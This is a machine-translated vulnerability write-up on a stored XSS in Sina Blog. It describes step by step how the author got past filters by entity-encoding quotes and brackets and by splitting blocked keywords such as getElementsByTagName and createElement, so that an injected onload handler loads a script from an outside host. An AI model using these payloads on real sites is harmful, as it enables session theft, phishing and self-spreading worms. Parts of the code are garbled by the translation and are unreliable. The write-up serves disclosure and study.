Sina Blog stored XSS vulnerability can load arbitrary external js files

Sina Blog finds a stored XSS and can insert any external js file after successfully bypassing the restriction.
 
Phishing, worms, and everything can be done directly.
Let's analyze and share with you the entire process of finding and exploiting this vulnerability.
 
 
1. I saw a lot of wooyun's stored XSS posts starting with images, videos, and so on. So I went to the Sina Blog homepage and sent a graph test.
 
Tried.
 
Original post code for packet capture
 
<A id = up_img_58081338895761039 href = "http://album.sina.com.cn/pic/6f81831bhc1b7f66073a7&amp;690" target = _ blank> </A> <BR> 966
 
 
2. I added '"> </\ To the src address in the IMG label just like I used to test the XSS vulnerability of other websites to test whether the address is filtered.
 
Special characters, such as src = "xxxx'"> </\"
 
As expected, the results are filtered out ".
 
 
3. Now I want to filter out "So & quot; Are there any filters?
 
Modify the post address to the following format:
 
Src = "xxxx & quot; onload = & quot; alert (1) & quot ;"
 
After submission, refresh and 1 is displayed, indicating that alert (1) is executed. At that time, I was very happy because it indicates that there is a storage-type XSS, no
 
Filter onload and & quot ;.
 
 
4. The idea is to insert an external js file like everyone else.
 
After checking the source files on the home page, I found that the 3rd script tags are in the src form, so I wrote the following code in the post data.
 
Src = "xxxx & quot; onload = & quot; document. getElementsByTagName ('script') [2]. src = 'HTTP: // px1624.sinaapp.com/pxren.js'&quot ;"
 
The call was not successful, and the image was not displayed. Using F12 to view the source code does not see any data related to my post.
 
 
5. After thinking about it, Sina should have filtered out single quotes, So I replaced all single quotes with & #39;
 
I found that it was still unsuccessful. After a period of testing, I found that [] was also filtered out, So I replaced [] with & # x5B; and & # x5D;
 
The following post data is generated:
 
Src = "xxxx & quot; onload = & quot; document. getElementsByTagName (& #39; script & #39;) & # x5B; 2 & # x5D ;. src = & amp; #39; http://px1624.sinaapp.com/pxrenren.js&#39;&quot ;"
 
 
6. But it still fails. It's really sina. There are a lot of restrictions. Even if you find the xss point and want to insert external js files, it's still difficult.
 
Then I thought about whether the keywords such as document or getElementsByTagName were filtered out?
 
So I tried alert (document. cookie) and found that it could pop up. It should have filtered out getElementsByTagName.
 
But here we need to use getElementsByTagName to modify the src in the script. What should we do?
Www.2cto.com
 
7. I tried to use String. fromCharCode () to convert getElementsByTagName to an ASCII code to bypass it. The result still does not work.
 
Finally, I thought of a string splitting method. I took the getElementsByTagName apart and wrote it to bypass the restriction. The method is as follows:
 
Document. getElementsByTagName ------> document ['get' + 'elementsbytagname']
 
The post data is as follows:
 
Src = "xxxx & quot; onload = & quot; document & # x5B; & #39; get & #39; + & #39; ElementsByTagName & #39; & # x5D; (& #39; script & #39;) & # x5B; 2 & # x5D ;. src = & amp; #39; http://px1624.sinaapp.com/pxrenren.js&#39;&quot ;"
 
 
Result
 
 






Finally, external js is successfully called.
 
 
8. But it is not complete yet, because document. getElementsByTagName is IE-only. If you use a non-IE browser, it won't be tricky.
 
Therefore, I need to write a code to kill a browser.
 
Next we will go to Google's browser for testing.
 
I thought
 
Var s = document. createElement ("script ");
S. src = "JS address ";
Document. body. appendChild (s );
 
 
9. Sure enough, Sina also filtered out keywords such as createElement and appendChild,
 
The bypass method is the same as above, and the string is separated and written.
 
The Code is as follows:
 
& Quot; onload = & quot; var & #32; s = document & # x5B; & #39; creat & #39; + & #39; eElement & #39; & # x5D; (& #39; script & #39;); s. src = & #39; values (s) & quot;
 
Result discovery
 
Var & #32; s = the space here after submission & #32; is automatically changed to 20%.
 
So I thought of a tab that is similar to a space,
 
Var & #09; s = after the result is submitted here & #09; it is also automatically changed to % 09;
 
 
10. I wiped it. It seems that there is only one trick. Use the properties of window to kill it!
 
Replace var s and s in the above Code with window. s, and the post code is changed
 
& Quot; onload = & quot; window. s = document & # x5B; & #39; creat & #39; + & #39; eElement & #39; & # x5D; (& #39; script & #39;); window. s. src = & amp; #39; trim (window. s) & quot;
 
Test, finally OK, all browsers kill!
 
Firefox and Google
 
 
 
 
 







 
The following figure shows the code in charles and F12.
 
 
 
 




The circled part is the self-inserted Construction Code in the post data.
 
 
 
 
 
It shows that my external js file is successfully called.
 
 
When I tried Renren network last time
 
Onlaod = "document. getElementsByTagName ('script') [2]. src = 'HTTP: // px1624.sinaapp.com/pxren.js '"
It's okay. I didn't expect Sina to filter and limit so much here, So security is not a level.
 
 
After a long time, I finally succeeded in calling arbitrary external JavaScript code.
 
Finally, I would like to thank gainover for some tips and help during my breakthrough. Thank you for your careful reading and analysis!
 
Author px1624